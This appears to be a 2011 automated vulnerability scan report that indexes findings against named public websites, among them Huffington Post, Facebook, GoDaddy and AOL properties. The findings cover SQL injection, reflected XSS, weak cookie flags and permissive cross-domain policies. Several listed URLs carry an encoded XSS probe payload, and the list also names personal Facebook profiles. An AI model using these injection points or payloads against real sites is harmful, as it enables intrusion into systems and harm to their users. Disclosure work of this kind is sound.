XSS, SQL Injection, HTTP Header Injection, Insecure Configuration, Information Disclsoure, GHDB DORK Report 05052011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Thu May 05 13:09:24 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. SQL injection

1.1. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.huffingtonpost.com/threeup.php [v parameter]

2. Cross-site scripting (reflected)

2.1. http://www.aolnews.com/category/goodnews/ [REST URL parameter 2]

2.2. http://www.bankrate.com/funnel/mortgages/ [name of an arbitrarily supplied request parameter]

2.3. http://www.citysbest.com/ [icid parameter]

2.4. http://www.citysbest.com/ [name of an arbitrarily supplied request parameter]

2.5. http://www.citysbest.com/traffic/ [REST URL parameter 1]

2.6. http://www.citysbest.com/traffic/ [REST URL parameter 1]

2.7. http://www.dailyfinance.com/markets/mostactives [REST URL parameter 2]

2.8. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [REST URL parameter 2]

2.9. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [name of an arbitrarily supplied request parameter]

2.10. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [REST URL parameter 3]

2.11. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [name of an arbitrarily supplied request parameter]

2.12. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [REST URL parameter 3]

2.13. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [name of an arbitrarily supplied request parameter]

2.14. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [REST URL parameter 3]

2.15. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [name of an arbitrarily supplied request parameter]

2.16. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

2.17. http://www.huffingtonpost.com/ [icid parameter]

2.18. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]

2.19. http://www.huffingtonpost.com/2011/05/02/ [name of an arbitrarily supplied request parameter]

2.20. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html [name of an arbitrarily supplied request parameter]

2.21. http://www.huffingtonpost.com/2011/05/04/ [name of an arbitrarily supplied request parameter]

2.22. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html [name of an arbitrarily supplied request parameter]

2.23. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html [name of an arbitrarily supplied request parameter]

2.24. http://www.huffingtonpost.com/ads/check_flights.php [name of an arbitrarily supplied request parameter]

2.25. http://www.huffingtonpost.com/ads/check_flights.php [spot parameter]

2.26. http://www.huffingtonpost.com/advertise/ [name of an arbitrarily supplied request parameter]

2.27. http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter]

2.28. http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter]

2.29. http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter]

2.30. http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter]

2.31. http://www.huffingtonpost.com/users/logout/ [name of an arbitrarily supplied request parameter]

2.32. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 1]

2.33. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 2]

2.34. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]

2.35. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]

2.36. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]

2.37. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]

2.38. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]

2.39. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]

2.40. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]

2.41. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]

2.42. http://www.moviefone.com/ [name of an arbitrarily supplied request parameter]

2.43. http://www.pageflakes.com/subscribe.aspx [REST URL parameter 1]

2.44. http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter]

2.45. http://www.popeater.com/ [name of an arbitrarily supplied request parameter]

2.46. http://www.tuaw.com/hub/app-reviews [name of an arbitrarily supplied request parameter]

2.47. https://www.godaddy.com/gdshop/hosting/landing.asp [User-Agent HTTP header]

2.48. https://www.godaddy.com/gdshop/registrar/search.asp [User-Agent HTTP header]

2.49. https://www.godaddy.com/gdshop/website.asp [User-Agent HTTP header]

2.50. http://www.aol.com/ [dlact cookie]

2.51. http://www.aol.com/ [rrpmo1 cookie]

2.52. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 [REST URL parameter 3]

2.53. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783 [REST URL parameter 3]

2.54. http://www.facebook.com/people/Bucky-Jordan/100000824820783 [REST URL parameter 3]

2.55. http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22 [REST URL parameter 4]

3. Flash cross-domain policy

3.1. http://www.aolcdn.com/crossdomain.xml

3.2. http://www.everydayhealth.com/crossdomain.xml

3.3. http://www.huffingtonpost.com/crossdomain.xml

3.4. http://www.mapquest.com/crossdomain.xml

3.5. http://xml.truveo.com/crossdomain.xml

3.6. http://www.aol.com/crossdomain.xml

3.7. http://www.aolnews.com/crossdomain.xml

3.8. http://www.apple.com/crossdomain.xml

3.9. http://www.blogsmithmedia.com/crossdomain.xml

3.10. http://www.citysbest.com/crossdomain.xml

3.11. http://www.dailyfinance.com/crossdomain.xml

3.12. http://www.dooce.com/crossdomain.xml

3.13. http://www.facebook.com/crossdomain.xml

3.14. https://www.facebook.com/crossdomain.xml

3.15. http://www.ft.com/crossdomain.xml

3.16. https://www.godaddy.com/crossdomain.xml

3.17. http://www.ibm.com/crossdomain.xml

3.18. http://www.marketwatch.com/crossdomain.xml

3.19. http://www.mmafighting.com/crossdomain.xml

3.20. http://www.moviefone.com/crossdomain.xml

3.21. http://www.netvibes.com/crossdomain.xml

3.22. http://www.pageflakes.com/crossdomain.xml

3.23. http://www.popeater.com/crossdomain.xml

3.24. http://www.realtytrac.com/crossdomain.xml

3.25. http://www.tuaw.com/crossdomain.xml

3.26. http://www.truveo.com/crossdomain.xml

4. Silverlight cross-domain policy

5. Cleartext submission of password

5.1. http://www.facebook.com/

5.2. http://www.facebook.com/r.php

5.3. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

5.4. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

6. SSL cookie without secure flag set

6.1. https://www.fightmagazine.com/mma-magazine/subscribe.asp

6.2. https://www.godaddy.com/

6.3. https://www.godaddy.com/domains/search.aspx

6.4. https://www.facebook.com/

6.5. https://www.facebook.com/ajax/intl/language_dialog.php

6.6. https://www.facebook.com/h02332

6.7. https://www.facebook.com/h02332

6.8. https://www.facebook.com/h02332

6.9. https://www.facebook.com/help/contact.php

6.10. https://www.facebook.com/login.php

6.11. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

6.12. https://www.facebook.com/pages/create.php

6.13. https://www.facebook.com/r.php

6.14. https://www.facebook.com/recover.php

6.15. https://www.godaddy.com/gdshop/hosting/landing.asp

6.16. https://www.godaddy.com/gdshop/registrar/search.asp

6.17. https://www.godaddy.com/gdshop/website.asp

7. Session token in URL

8. SSL certificate

8.1. https://www.facebook.com/

8.2. https://www.fightmagazine.com/

8.3. https://www.godaddy.com/

8.4. https://www.neodata.com/

9. ASP.NET ViewState without MAC enabled

9.1. http://www.bankrate.com/funnel/mortgages/

9.2. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

9.3. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

9.4. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

9.5. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

10. Cookie scoped to parent domain

10.1. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

10.2. http://www.mapquest.com/

10.3. http://www.mapquest.com/_svc/ad/getads

10.4. http://www.mapquest.com/_svc/apixel

10.5. http://www.mapquest.com/_svc/publishing/promo

10.6. http://www.mapquest.com/_svc/searchio

10.7. http://www.mapquest.com/cdn/_uac/adpage.htm

10.8. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

10.9. http://www.mapquest.com/icons/stop.png

10.10. http://www.facebook.com/

10.11. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

10.12. http://www.facebook.com/10000082482078341583

10.13. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

10.14. http://www.facebook.com/1242845259

10.15. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

10.16. http://www.facebook.com/2008/fbml

10.17. http://www.facebook.com/AOLrealestate

10.18. http://www.facebook.com/BPAmerica

10.19. http://www.facebook.com/DailyFinance

10.20. http://www.facebook.com/HockeyKen

10.21. http://www.facebook.com/KickIceForever

10.22. http://www.facebook.com/LadyBonesie

10.23. http://www.facebook.com/Loizza

10.24. http://www.facebook.com/aim

10.25. http://www.facebook.com/ajax/intl/language_dialog.php

10.26. http://www.facebook.com/ajax/reg_birthday_help.php

10.27. http://www.facebook.com/ajax/register/logging.php

10.28. http://www.facebook.com/aol

10.29. http://www.facebook.com/aolradio

10.30. http://www.facebook.com/badges

10.31. http://www.facebook.com/burkerkink

10.32. http://www.facebook.com/campaign/landing.php

10.33. http://www.facebook.com/careers/

10.34. http://www.facebook.com/deedee.perez1

10.35. http://www.facebook.com/directory/pages/

10.36. http://www.facebook.com/directory/people/

10.37. http://www.facebook.com/facebook

10.38. http://www.facebook.com/fayse

10.39. http://www.facebook.com/find-friends

10.40. http://www.facebook.com/find-friends

10.41. http://www.facebook.com/gale.l.schenk

10.42. http://www.facebook.com/help/

10.43. http://www.facebook.com/help/

10.44. http://www.facebook.com/home.php

10.45. http://www.facebook.com/izaOllie

10.46. http://www.facebook.com/jezzas

10.47. http://www.facebook.com/kimberly.christ

10.48. http://www.facebook.com/ladonna.lokey

10.49. http://www.facebook.com/lakendra.roberts

10.50. http://www.facebook.com/login.php

10.51. http://www.facebook.com/login.php

10.52. http://www.facebook.com/mapquest

10.53. http://www.facebook.com/matthew.oliveira2

10.54. http://www.facebook.com/mmafighting

10.55. http://www.facebook.com/mobile

10.56. http://www.facebook.com/mobile/

10.57. http://www.facebook.com/mobile/

10.58. http://www.facebook.com/pages/Barnesville/115038011847083

10.59. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

10.60. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

10.61. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

10.62. http://www.facebook.com/pages/Editor-in-Chief/137829579583400

10.63. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

10.64. http://www.facebook.com/pages/HMFIC/149403761740008

10.65. http://www.facebook.com/pages/HuffPost-World/70242384902

10.66. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

10.67. http://www.facebook.com/pages/Merchandiser/123981654314779

10.68. http://www.facebook.com/pages/New-Haven-College/130105783687523

10.69. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

10.70. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

10.71. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

10.72. http://www.facebook.com/pages/Sporting-News/104068362964496

10.73. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

10.74. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

10.75. http://www.facebook.com/pages/create.php

10.76. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

10.77. http://www.facebook.com/patroyo

10.78. http://www.facebook.com/people/Alexander-Bucky%20-Jordan/1242845259

10.79. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

10.80. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

10.81. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

10.82. http://www.facebook.com/people/Bucky-Jordan/100000824820783

10.83. http://www.facebook.com/policy.php

10.84. http://www.facebook.com/privacy/explanation.php

10.85. http://www.facebook.com/profile.php

10.86. http://www.facebook.com/r.php

10.87. http://www.facebook.com/recover.php

10.88. http://www.facebook.com/robynalys

10.89. http://www.facebook.com/share.php

10.90. http://www.facebook.com/sharer.php

10.91. http://www.facebook.com/skdarealist

10.92. http://www.facebook.com/sportingnews

10.93. http://www.facebook.com/stefanoboscolomarchi

10.94. http://www.facebook.com/techcrunch

10.95. http://www.facebook.com/terms.php

10.96. http://www.facebook.com/theteebers

10.97. http://www.facebook.com/wmoppert

10.98. https://www.facebook.com/

10.99. https://www.facebook.com/ajax/intl/language_dialog.php

10.100. https://www.facebook.com/h02332

10.101. https://www.facebook.com/h02332

10.102. https://www.facebook.com/h02332

10.103. https://www.facebook.com/help/contact.php

10.104. https://www.facebook.com/login.php

10.105. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

10.106. https://www.facebook.com/pages/create.php

10.107. https://www.facebook.com/r.php

10.108. https://www.facebook.com/recover.php

10.109. https://www.godaddy.com/

10.110. https://www.godaddy.com/domains/search.aspx

10.111. https://www.godaddy.com/gdshop/hosting/landing.asp

10.112. https://www.godaddy.com/gdshop/registrar/search.asp

10.113. https://www.godaddy.com/gdshop/website.asp

10.114. http://www.google.com/finance

10.115. http://www.huffingtonpost.com/users/logout/

10.116. http://www.marketwatch.com/News/Story/Story.aspx

10.117. http://www.moviefone.com/

10.118. http://www.truveo.com/

10.119. http://www.truveo.com/search

11. Cookie without HttpOnly flag set

11.1. http://www.aol.com/

11.2. http://www.aol.com/ajax.jsp

11.3. http://www.crunchboard.com/opening/detailjob.php

11.4. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

11.5. https://www.fightmagazine.com/mma-magazine/subscribe.asp

11.6. https://www.godaddy.com/gdshop/catalog.asp

11.7. https://www.godaddy.com/gdshop/hosting/landing.asp

11.8. https://www.godaddy.com/gdshop/registrar/search.asp

11.9. https://www.godaddy.com/gdshop/website.asp

11.10. http://www.mapquest.com/

11.11. http://www.mapquest.com/_svc/ad/getads

11.12. http://www.mapquest.com/_svc/apixel

11.13. http://www.mapquest.com/_svc/publishing/promo

11.14. http://www.mapquest.com/_svc/searchio

11.15. http://www.mapquest.com/cdn/_uac/adpage.htm

11.16. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

11.17. http://www.mapquest.com/icons/stop.png

11.18. http://www.mmawarehouse.com/

11.19. http://www.mmawarehouse.com/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm

11.20. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm

11.21. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm

11.22. http://www.mmawarehouse.com/FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm

11.23. http://www.mmawarehouse.com/FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm

11.24. http://www.mmawarehouse.com/Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm

11.25. http://www.mmawarehouse.com/Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm

11.26. http://www.truveo.com/

11.27. http://www.truveo.com/search

11.28. http://yellowpages.aol.com/

11.29. http://www.citysbest.com/

11.30. http://www.dailyfinance.com/

11.31. http://www.dailyfinance.com/

11.32. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

11.33. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

11.34. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

11.35. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

11.36. http://www.facebook.com/

11.37. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

11.38. http://www.facebook.com/10000082482078341583

11.39. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

11.40. http://www.facebook.com/1242845259

11.41. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

11.42. http://www.facebook.com/2008/fbml

11.43. http://www.facebook.com/HockeyKen

11.44. http://www.facebook.com/KickIceForever

11.45. http://www.facebook.com/Loizza

11.46. http://www.facebook.com/burkerkink

11.47. http://www.facebook.com/careers/

11.48. http://www.facebook.com/deedee.perez1

11.49. http://www.facebook.com/directory/pages/

11.50. http://www.facebook.com/directory/people/

11.51. http://www.facebook.com/fayse

11.52. http://www.facebook.com/find-friends

11.53. http://www.facebook.com/gale.l.schenk

11.54. http://www.facebook.com/help/

11.55. http://www.facebook.com/izaOllie

11.56. http://www.facebook.com/jezzas

11.57. http://www.facebook.com/kimberly.christ

11.58. http://www.facebook.com/ladonna.lokey

11.59. http://www.facebook.com/lakendra.roberts

11.60. http://www.facebook.com/login.php

11.61. http://www.facebook.com/matthew.oliveira2

11.62. http://www.facebook.com/mobile/

11.63. http://www.facebook.com/pages/create.php

11.64. http://www.facebook.com/patroyo

11.65. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

11.66. http://www.facebook.com/people/Bucky-Jordan/100000824820783

11.67. http://www.facebook.com/privacy/explanation.php

11.68. http://www.facebook.com/robynalys

11.69. http://www.facebook.com/share.php

11.70. http://www.facebook.com/sharer.php

11.71. http://www.facebook.com/skdarealist

11.72. http://www.facebook.com/stefanoboscolomarchi

11.73. http://www.facebook.com/theteebers

11.74. http://www.facebook.com/wmoppert

11.75. https://www.facebook.com/

11.76. https://www.facebook.com/h02332

11.77. https://www.facebook.com/h02332

11.78. https://www.facebook.com/help/contact.php

11.79. https://www.facebook.com/login.php

11.80. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

11.81. https://www.facebook.com/pages/create.php

11.82. https://www.facebook.com/recover.php

11.83. https://www.godaddy.com/

11.84. https://www.godaddy.com/domains/search.aspx

11.85. http://www.google.com/finance

11.86. http://www.huffingtonpost.com/include/geopromo.php

11.87. http://www.huffingtonpost.com/users/logout/

11.88. http://www.mapquest.com/directions

11.89. http://www.mapquest.com/maps

11.90. http://www.mapquest.com/routeplanner

11.91. http://www.marketwatch.com/News/Story/Story.aspx

11.92. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

11.93. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

11.94. http://www.moviefone.com/

11.95. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

11.96. http://www.pageflakes.com/subscribe.aspx

11.97. http://www.popeater.com/

11.98. http://www.tuaw.com/hub/app-reviews

12. Password field with autocomplete enabled

12.1. http://www.facebook.com/

12.2. http://www.facebook.com/

12.3. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

12.4. http://www.facebook.com/10000082482078341583

12.5. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

12.6. http://www.facebook.com/1242845259

12.7. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

12.8. http://www.facebook.com/2008/fbml

12.9. http://www.facebook.com/AOLrealestate

12.10. http://www.facebook.com/BPAmerica

12.11. http://www.facebook.com/DailyFinance

12.12. http://www.facebook.com/HockeyKen

12.13. http://www.facebook.com/KickIceForever

12.14. http://www.facebook.com/LadyBonesie

12.15. http://www.facebook.com/Loizza

12.16. http://www.facebook.com/aim

12.17. http://www.facebook.com/ajax/intl/language_dialog.php

12.18. http://www.facebook.com/aol

12.19. http://www.facebook.com/aolradio

12.20. http://www.facebook.com/burkerkink

12.21. http://www.facebook.com/careers/

12.22. http://www.facebook.com/deedee.perez1

12.23. http://www.facebook.com/directory/pages/

12.24. http://www.facebook.com/directory/people/

12.25. http://www.facebook.com/facebook

12.26. http://www.facebook.com/fayse

12.27. http://www.facebook.com/find-friends

12.28. http://www.facebook.com/gale.l.schenk

12.29. http://www.facebook.com/help/

12.30. http://www.facebook.com/izaOllie

12.31. http://www.facebook.com/jezzas

12.32. http://www.facebook.com/kimberly.christ

12.33. http://www.facebook.com/ladonna.lokey

12.34. http://www.facebook.com/lakendra.roberts

12.35. http://www.facebook.com/login.php

12.36. http://www.facebook.com/matthew.oliveira2

12.37. http://www.facebook.com/mmafighting

12.38. http://www.facebook.com/mobile/

12.39. http://www.facebook.com/pages/Barnesville/115038011847083

12.40. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

12.41. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

12.42. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

12.43. http://www.facebook.com/pages/Editor-in-Chief/137829579583400

12.44. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

12.45. http://www.facebook.com/pages/HMFIC/149403761740008

12.46. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

12.47. http://www.facebook.com/pages/Merchandiser/123981654314779

12.48. http://www.facebook.com/pages/New-Haven-College/130105783687523

12.49. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

12.50. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

12.51. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

12.52. http://www.facebook.com/pages/Sporting-News/104068362964496

12.53. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

12.54. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

12.55. http://www.facebook.com/pages/create.php

12.56. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

12.57. http://www.facebook.com/patroyo

12.58. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

12.59. http://www.facebook.com/people/Bucky-Jordan/100000824820783

12.60. http://www.facebook.com/plugins/facepile.php

12.61. http://www.facebook.com/plugins/likebox.php

12.62. http://www.facebook.com/policy.php

12.63. http://www.facebook.com/privacy/explanation.php

12.64. http://www.facebook.com/r.php

12.65. http://www.facebook.com/r.php

12.66. http://www.facebook.com/r.php

12.67. http://www.facebook.com/r.php

12.68. http://www.facebook.com/robynalys

12.69. http://www.facebook.com/share.php

12.70. http://www.facebook.com/sharer.php

12.71. http://www.facebook.com/skdarealist

12.72. http://www.facebook.com/sportingnews

12.73. http://www.facebook.com/stefanoboscolomarchi

12.74. http://www.facebook.com/techcrunch

12.75. http://www.facebook.com/terms.php

12.76. http://www.facebook.com/theteebers

12.77. http://www.facebook.com/wmoppert

12.78. https://www.facebook.com/

12.79. https://www.facebook.com/

12.80. https://www.facebook.com/ajax/intl/language_dialog.php

12.81. https://www.facebook.com/h02332

12.82. https://www.facebook.com/help/contact.php

12.83. https://www.facebook.com/login.php

12.84. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

12.85. https://www.facebook.com/pages/create.php

12.86. https://www.facebook.com/r.php

12.87. https://www.facebook.com/r.php

12.88. https://www.facebook.com/r.php

12.89. https://www.facebook.com/recover.php

12.90. https://www.godaddy.com/

12.91. https://www.godaddy.com/domains/search.aspx

12.92. https://www.godaddy.com/gdshop/hosting/landing.asp

12.93. http://www.marketwatch.com/News/Story/Story.aspx

12.94. http://www.marketwatch.com/News/Story/Story.aspx

12.95. http://www.marketwatch.com/News/Story/Story.aspx

12.96. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

12.97. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

12.98. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

13. ASP.NET debugging enabled

13.1. http://www.eyewonderlabs.com/Default.aspx

13.2. http://www.pageflakes.com/Default.aspx

14. Referer-dependent response

14.1. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

14.2. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

14.3. http://www.facebook.com/login.php

14.4. http://www.facebook.com/plugins/activity.php

14.5. http://www.facebook.com/plugins/like.php

14.6. http://www.facebook.com/plugins/likebox.php

14.7. http://www.facebook.com/plugins/recommendations.php

14.8. http://www.facebook.com/policy.php

14.9. https://www.facebook.com/

14.10. https://www.facebook.com/h02332

14.11. https://www.facebook.com/help/contact.php

14.12. http://www.huffingtonpost.com/

14.13. http://www.tuaw.com/hub/app-reviews

15. Cross-domain POST

15.1. http://www.dailyfinance.com/

15.2. http://www.dailyfinance.com/markets/mostactives

15.3. http://www.lakewoodbeacon.org/

16. Cross-domain Referer leakage

16.1. http://www.aol.com/ajax.jsp

16.2. http://www.aol.com/ajax.jsp

16.3. http://www.aol.com/ajax.jsp

16.4. http://www.aol.com/ajax.jsp

16.5. http://www.aol.com/ajax.jsp

16.6. http://www.aol.com/ajax.jsp

16.7. http://www.aol.com/ajax.jsp

16.8. http://www.aol.com/ajax.jsp

16.9. http://www.aol.com/ajax.jsp

16.10. http://www.aol.com/ajax.jsp

16.11. http://www.aol.com/ajax.jsp

16.12. http://www.aol.com/ajax.jsp

16.13. http://www.aol.com/ajax.jsp

16.14. http://www.aol.com/ajax.jsp

16.15. http://www.aol.com/ajax.jsp

16.16. http://www.aol.com/ajax.jsp

16.17. http://www.aol.com/ajax.jsp

16.18. http://www.aol.com/ajax.jsp

16.19. http://www.aol.com/ajax.jsp

16.20. http://www.aol.com/ajax.jsp

16.21. http://www.aol.com/ajax.jsp

16.22. http://www.aol.com/ajax.jsp

16.23. http://www.aol.com/ajax.jsp

16.24. http://www.aol.com/ajax.jsp

16.25. http://www.apple.com/itunes/affiliates/download/

16.26. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js

16.27. http://www.blogsmithmedia.com/www.dailyfinance.com/include/dailyfinance.js

16.28. http://www.citysbest.com/

16.29. http://www.dailyfinance.com/

16.30. http://www.facebook.com/BPAmerica

16.31. http://www.facebook.com/ajax/intl/language_dialog.php

16.32. http://www.facebook.com/careers/

16.33. http://www.facebook.com/find-friends

16.34. http://www.facebook.com/find-friends

16.35. http://www.facebook.com/help/

16.36. http://www.facebook.com/help/

16.37. http://www.facebook.com/help/

16.38. http://www.facebook.com/login.php

16.39. http://www.facebook.com/mobile/

16.40. http://www.facebook.com/mobile/

16.41. http://www.facebook.com/pages/create.php

16.42. http://www.facebook.com/plugins/activity.php

16.43. http://www.facebook.com/plugins/activity.php

16.44. http://www.facebook.com/plugins/activity.php

16.45. http://www.facebook.com/plugins/activity.php

16.46. http://www.facebook.com/plugins/comments.php

16.47. http://www.facebook.com/plugins/comments.php

16.48. http://www.facebook.com/plugins/comments.php

16.49. http://www.facebook.com/plugins/facepile.php

16.50. http://www.facebook.com/plugins/like.php

16.51. http://www.facebook.com/plugins/like.php

16.52. http://www.facebook.com/plugins/likebox.php

16.53. http://www.facebook.com/plugins/likebox.php

16.54. http://www.facebook.com/plugins/likebox.php

16.55. http://www.facebook.com/plugins/likebox.php

16.56. http://www.facebook.com/plugins/likebox.php

16.57. http://www.facebook.com/plugins/likebox.php

16.58. http://www.facebook.com/plugins/likebox.php

16.59. http://www.facebook.com/plugins/likebox.php

16.60. http://www.facebook.com/plugins/likebox.php

16.61. http://www.facebook.com/plugins/likebox.php

16.62. http://www.facebook.com/plugins/likebox.php

16.63. http://www.facebook.com/plugins/likebox.php

16.64. http://www.facebook.com/plugins/likebox.php

16.65. http://www.facebook.com/plugins/likebox.php

16.66. http://www.facebook.com/plugins/likebox.php

16.67. http://www.facebook.com/plugins/likebox.php

16.68. http://www.facebook.com/plugins/recommendations.php

16.69. http://www.facebook.com/plugins/recommendations.php

16.70. http://www.facebook.com/plugins/recommendations.php

16.71. http://www.facebook.com/plugins/send.php

16.72. http://www.facebook.com/plugins/send.php

